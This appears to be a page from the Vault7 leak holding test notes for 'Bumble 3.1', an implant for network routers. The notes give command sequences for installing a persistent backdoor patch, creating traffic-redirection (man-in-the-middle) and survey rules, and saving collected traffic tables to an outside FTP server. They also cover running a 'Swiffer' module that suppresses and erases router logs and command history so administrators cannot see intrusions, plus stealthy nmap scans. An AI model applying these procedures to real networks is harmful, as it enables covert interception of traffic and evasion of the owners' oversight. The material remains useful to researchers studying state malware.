Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #14587667
Bumble 3.1 Test Notes
Test Summary
- Downloaded and installed COGComputer Operations Group ICON Debian 8.1 image.
- CT 2.7 which was delieved is compatible with current ICON image.
- MTU settings
- CT MTUMaximum Transmission Unit setting can not go below 120 bytes.
- Egress from Atk setting delaysim MTU<=108 and CTCounter Terrorism MTU<128 allows CTCounter Terrorism to connect, but states "currenct packet size restrictions are incompatible with selected Score protocol".
- Ingress to Atk MTU<=508Bytes.
- Score requires a minimum MTUMaximum Transmission Unit of 480Bytes for return traffic (from implant to CTCounter Terrorism).
- Flux will not be used with this tool so it will not be tested with flux.
Progress/Notes
- Sample survey commands:
tp survey create 192.0.0.0 255.0.0.0 0 0.0.0.0 0.0.0.0 0 icmp -en
tp survey create 192.0.0.0 255.0.0.0 0 0.0.0.0 0.0.0.0 0 tcp -en
- Sample redirection rule:
- redir create 10.1.243.2 255.255.255.255 0 0 XXX.X.XXX.XXX (JUMPSTART-5[US]) 255.255.255.255 0 0 tcp 10.1.243.2 0 XXX.X.XXX.XXX (JUMPSTART-5[US]) 0 0 -en
- Sample traffic shaping:
- sudo tc qdisc add dev eth0 root netem delay 2.5s 0.5s loss 25% 25% duplicate 2% corrupt 3% reorder 25% 50%
- sudo ip link set eth0 mtu 128
Tests
- Smoke Tests
- Install PBD and Establish Comms
- Refer to Bumble command script on share.
- Inspect logbuffer for logs left by patch installation
- dis logbuffer reverse
- dis logbuffer summary
- dis history-command all
- Successfully tested with Bumble 3.1 on 10/28/2015 (w/o latency) and 11/3/2015 (w latency).
-
Survey - ct_pt1-survey.exp
- Reboot DUT, install implant, establish comms via CT.
- Confirm implant is installed and activate score
- tp cmd "pbd probe"
- module show
- redir show
- module start score
- module show (confirm score is activated)
- redir show (there should be no rules)
- Add survey rule: tp survey create XXX.X.XXX.X (JUMPSTART-5[US]) 255.255.255.0 0 0.0.0.0 0.0.0.0 0 tcp -en
- redir show
- <sleep for 20 seconds to allow time to survey>
- Retrieve trans table: tp showtrans
- quit
- Successfully tested with Bumble 3.1 on 10/28/2015 (w/o latency) and 11/3/2015 (w latency).
- Redirection (MitM) - ct_pt2-redir.exp
- Reboot DUT, install implant, establish comms via CT.
- Confirm implant is installed and activate score (see Test 2 for commands to run)
- Add redir rule: redir create 192.168.254.6 255.255.255.255 0 0 XXX.XXX.X.XX (GB) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0
- Source IP/Mask: 192.168.254.6/32 - Atk VM
- Source Port Range: 0 0 (any)
- Destination IP/Mask: XXX.XXX.X.XX (GB)/32 - WWW3
- Destination Port Range: 0 0 (any)
- Protocol: TCP
- New Source IP:Port: 192.168.254.6:0 - Atk VM
- New Destination IP:Port: XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]):0 - WWW4
- TTL: 0 (don't change)
- Successfully tested with Bumble 3.1 on 10/28/2015 (w/o latency) and 11/3/2015 (w latency).
- Transaction Table rollover
- Reboot DUT, install implant, establish comms via CT.
- Start score: module start score
- Configure transtable aging time to 1 second: tp filter -t 1
- From Atk: wget --output-document=- http://XXX.XXX.X.XX (GB)
- Response should be from Bumble webserver #3 - XXX.XXX.X.XX (GB)
- Add redir rule: redir create 192.168.254.6 255.255.255.255 0 0 XXX.XXX.X.XX (GB) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- Test redir rule: wget --output-document=- http://XXX.XXX.X.XX (GB)
- Response should be from Bumble webserver #4 - XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US])
- Fill up transtable by running the "enterprise" profile on the Ixia. Also add a survey rule: tp survey create 192.0.0.0 255.0.0.0 0 0.0.0.0 0.0.0.0 0 tcp -en
- Check if redir still functions correctly: wget --output-document=- http://XXX.XXX.X.XX (GB)
- Response should be from Bumble webserver #4 - XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US])
- To futher confirm, check transtable using the command "tp showtrans" and take a snapshow of the first 10 entries.
- Wait 10 seconds and check the transtable again. Compare the first 10 entries with the snapshot you took. The entries should be unique. With the ixia running, enough entries should be created in a few seconds to cause the transtable to cycle.
- Successfully tested with Bumble 3.1 on 10/30/2015 (w/o latency).
- Swiffer - Log Suppression
- Reboot DUT, install implant, establish comms via CT.
- Insure swiffer is inactive: tp swiffer show
- Telnet to MSR and issue these commands:
- display this
- display users
- display tcp
- display logbuffer reverse
- display history-command all
- These commands should appear in the logbuffer and history command
- Activate swiffer at the CTCounter Terrorism prompt
- tp swiffer activate
- tp swiffer show
- At the MSR console and telnet prompt:
- Confirm info-center is disabled: display info-center
- display clock
- display ftp client source
- display interface brief
- display ip routing-table
- At the MSR console, issue thes commands
- Confirm there was no console message about the user connecting via telnet
- Confirm recent commands were not logged to log buffer: display logbuffer reverse
- Confirm recent commands are logged to history: display history-command all
- Disabling the info-center will not disable the command history logging. This is the reason for a snapshot of the history command file to be saved. The saved history file will overwrite this history when Swiffer is deactivated.
- This will also disable logging if a target admin issues commands. There is no way to distinguish who is issuing the command.
- Deactivate Swiffer using CT. Deactivating Swiffer restores the snapshot to the command history
- tp swiffer deactivate
- Wait 5 seconds and confirm swiffer is deactivated: tp swiffer show
- At the MSR console and telnet prompt, confirm logs were removed
- display logbuffer reverse
- display history-command all
- Successfully tested with Bumble 3.1 on 10/30/2015 (w/o latency).
- Reboot DUT, install implant, establish comms via CT.
- Swiffer - automatic deactivation
- At console: reset logbuffer
- ICON: Note the time using the 'date' command
- ICON: tp swiffer activate -t 300
- Wait 10 seconds
- ICON: tp swiffer show
- should be activated
- ICON: telnet 192.168.168.5
- ICON: display info-center
- ICON: dis this
- ICON: dis users
- At console: dis ip int brief
- At console: display history-command all
- display logbuffer reverse
- Wait until 5 minutes have expired.
- Ensure logs have been removed and swiffer deactivated
- At console: display history-command all
- At console: display logbuffer reverse
- ICON: tp swiffer show
- should be inactive
- Successfully tested with Bumble 3.1 on 10/30/2015 (w/o latency)
- Redir - Disable all rules then re-enable all rules
- Disable all redir rules: redir disable 0
- Confirm rules disabled: redir show
- Enable all redir rules: redir enable 0
- Check that redir rules are working.
- Successfully tested with Bumble 3.1 on 10/30/2015 (w/o latency).
- Save transtable to ftp server
- Save transtable
- tp savetrans ftp://administrator:password@XXX.XXX.XXX.X (DNIC-RNET-192-100-100[US])/transtable.bin -td 30
- Confirm transtable exists on FTPFile Transfer Protocol server and then delete.
- Save transtable again
- tp savetrans ftp://administrator:password@XXX.XXX.XXX.X (DNIC-RNET-192-100-100[US])/transtable.bin -td 30
- Confirm transtable exists on FTPFile Transfer Protocol server and then delete.
- Successfully tested with Bumble 3.1 on 10/30/2015 (w/o latency) and 11/3/2015 (w latency).
- Save transtable
- Save transtable to filesystem
Initial install
-
Save transtable to filesystem
tp savetrans file:/logfile/.transtable.bin -td 5 -t 3600
dir /all cfa0:/logfile
-
Delete file from filesystem
delete cfa0:/logfile/.transtable.bin
Save transtable to filesystem. Can not save transtable to filesystem more than once until autodelete time expires.
- Successfully tested with Bumble 3.1 on 11/4/2015 (w/o latency).
- Save transtable to filesystem if file already exists
- Repeat previous steps to save transtable to filesystem, but do not delete file.
- Save file again. Issue command "dir /all cfa0:/logfile"File time should be updated to the current time indicating file was re-written.
- Successfully tested with Bumble 3.1 on 11/4/2015 (w/o latency) and 11/4/2015 (w/ latency).
- Install PBD and Establish Comms
- Redirection Test - ACLAccess Control List circumvention
- Not plausible with current implant hook point
- Redirection Test (Lack of route on downstream router)
- Single Rule - ct_pt3-redir.exp (script starts at step iv)
Add default route to ASR: ip route 0.0.0.0 0.0.0.0 XXX.XXX.XX.X (EU-MAP-5[US]) name To_MSRFrom atk VM, ping XXX.XXX.XX.X (EU-MAP-5[US]). It should be successful.Remove default route from ASR: no ip route 0.0.0.0 0.0.0.0 XXX.XXX.XX.X (EU-MAP-5[US]) name To_MSR- From atk VM, ping XXX.XXX.XX.X (EU-MAP-5[US]). It should fail.
- Add redir rule: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- From atk VM, ping XXX.XXX.XX.X (EU-MAP-5[US]). It should be successful.
- Successfully tested with Bumble 3.1 on 10/28/2015 (w/o latency) and 11/3/2015 (w latency).
-
Multiple Rules
-
Repeat steps from previous test. Use the following rules:
- Loopback on ASR1002: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- WWW4 behind ASR: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- Successfully tested with Bumble 3.1 on 10/30/2015 (w/o latency).
-
Repeat steps from previous test. Use the following rules:
- Single Rule - ct_pt3-redir.exp (script starts at step iv)
- Redirection Test - Only specified protocol gets redirected / Lack of routes on MSR
- Ensure all redir rules are disabled/deleted.
- Attempt to retrieve webpage from Atk VM: wget --output-document=- http://XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) This should NOT be able to successfully retreive the webpage.
- Add redirection rule to allow TCPTransport Control Protocol from Atk VMVirtual Machine to WWW4 behind ASR: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 tcp XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- Retrieve webpage from Atk VM: wget --output-document=- http://XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) This should successfully retreive the webpage.
- From Atk VM, ping XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]). You should not get a ping response.
- Successfully tested with Bumble 3.1 on 10/30/2015 (w/o latency).
- Redirection Test - NMAPNetwork security scanner SYNFlag in TCP/IP Protocol Scan (all ports)
- Not testing since nmap will not be used to do large scans.
- Redirection Test - NMAPNetwork security scanner SYNFlag in TCP/IP Protocol Scan (< 15 ports) - ct_pt4-nmap.exp
- Start IXIA traffic (??)
- Should not be able to ping XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]), .2, .10 (/24) from Atk VM
- Set the transtable to timeout after 1 second so that redir rules don't get disabled: tp filter -t 1
- Add the following redir rules:
- redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- You should not be able to ping XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]), .2, .10 (/24) from Atk VM: sudo nmap -sP XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) --mtu 96 --stats-every 5m --min-rtt-timeout 7s
- Run the following nmap commands:
Check for open services/ports: sudo nmap -sS XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) -p 21,22,23,25,53,80,110,443,3389 --mtu 96 --stats-every 10m --min-rtt-timeout 7s
- Successfully tested with Bumble 3.1 on 10/28/2015 (w/o latency) and 11/3/2015 (w latency).
- Swiffer (while redir rules enabled)
- Repeat redir test (ct_pt4-nmap.exp) and leave it running.
- Activate swiffer
- tp swiffer activate
- From ICON, connect to target via telnet and execute "dis run", "dis clock", and "dis ip rout"
- Disconnect from telnet session.
- Deactivate swiffer
- Inspect logfile and logbuffer for any traces of telnet connection
- Successfully tested with Bumble 3.1 on 10/30/2015 (w/o latency).
- Swiffer - Telnet failed during session
- Confirm all logs get deleted if there are two telnet open sessions but one session close. It is assumed that swiffer will start and stop logging when the command is issued, but need to confirm.
- Swiffer - Info-Center gets enabled while Swiffer is active
- CT: tp swiffer activate
- ICON: dis clock
- ICON: dis ip rout
- Console: sys
- Console: info-center enable
- ICON: dis users
- CT: tp swiffer deactivate
- Console: dis logbuffer reverse
- Console: dis history-command all
- Once info-center is enabled, commands issues via telnet will appear in the logbuffer (dis logbuffer reverse). It will not appear in the 'dis history-command all' output.
- Swiffer successfully deactivated. Info-center remained off (dis info-center).
- Successfully tested with Bumble 3.1 on 11/2/2015 (w/o latency).
- Swiffer - Uninstall
- Look for remnants ("comsn" and "telnetd")
- Survey and Redirection used simultaneously
- This is NOT recommended, so it will not be tested.
- Forensics Test - Inspect Netflow on SolarWinds
- Ad hoc test - ICON disconnected during PBD (patch) installation
- telnet 192.168.168.5 (admin/admin)
ftp XXX.XXX.XXX.X (DNIC-RNET-192-100-100[US]) (administrator/password)
- ftp patch file to MSR.
- bin
- get patch.bin
- quit
- dir cfa0: !Confirm patch.bin was copied
- install activate patch cfa0:/patch.bin slot 0
- Before the patch completes, reboot the ICON VM.
- BUM-3
- Ad hoc test - Multiple reconnects to implant via CT
- Successfully tested with Bumble 3.1 on 10/28/2015 (w/o latency) and 11/6/2015 (w/ latency).
- Reconfigured interface
- With implant installed, configure another gigabit interface.
- Expect no observables
- Successfully tested with Bumble 3.1 on 10/30/2015 (w/o latency).
- Install PBD when PBD is already installed
- Successfully tested with Bumble 3.1 on 10/28/2015 (w/o latency) and 11/4/2015 (w latency).
- Re-attack after PBD already installed
- Reboot DUT, install implant, establish comms via CT, and run all tests: date && sudo time ./reboot_target.exp && sudo ./install_and_run.sh
- Disconnect from CTCounter Terrorism session.
- Re-install implant and re-run all tests: sudo ./install_and_run.sh
- Inspect 2nd round of test results to ensure tests were passed. Only one instance of PBD is present.
- dis proc cpu slot 0 | include comsn
- dis proc cpu slot 2 | include telnetd
- dis process memory slot 2 | include telnetd
- Successfully tested with Bumble 3.1 on 10/30/2015 (w/o latency) and 11/4/2015 (w latency).
- Forensics Tests
- Inspect pcap
- UDP packets appear normal
- Most TCPTransport Control Protocol appears normal.
- Telnet connections cause a lot of red to appear, likely due to the unreliability of the connection (delay sim is running). Telnet connections also receive a RSTReal-time Transport Protocol from the MSR periodically. It seems the MSR (server) issues the RSTReal-time Transport Protocol packet to close the telnet session.
- Inspect pcap
- Performance testing (IXIA)
- Check Cisco 3825 (OSPFOpen Shortest Path First neighbor) for any anomolies
- Checked 11/5/2015
Operator Notes
- Do not use survey and redirection at the same time.
- Do not save transtable to the filesystem. Only save to an ftp server.
- Disabling logging (using swiffer) will also disable logging for a target admin.
- swiffer will not hide telnet connection from "show users" output.
- Commands execute while swiffer is enabled will not be removed from the history (dis history-command all) until swiffer is deactivated. They will not appear in the log buffer at all (dis logbuffer). Info-Center will also be disabled as long as swiffer is active. If info-center is re-enabled (ie. by an admin), commands issues via telnet will appear in the logbuffer (dis logbuffer reverse). It will not appear in the 'dis history-command all' output.
- Add TP note about using Nmap with Score.
- How do we clear a kernel exception log should one occur?
- Once swiffer is stopped, it can not be restarted unless you re-install PBD.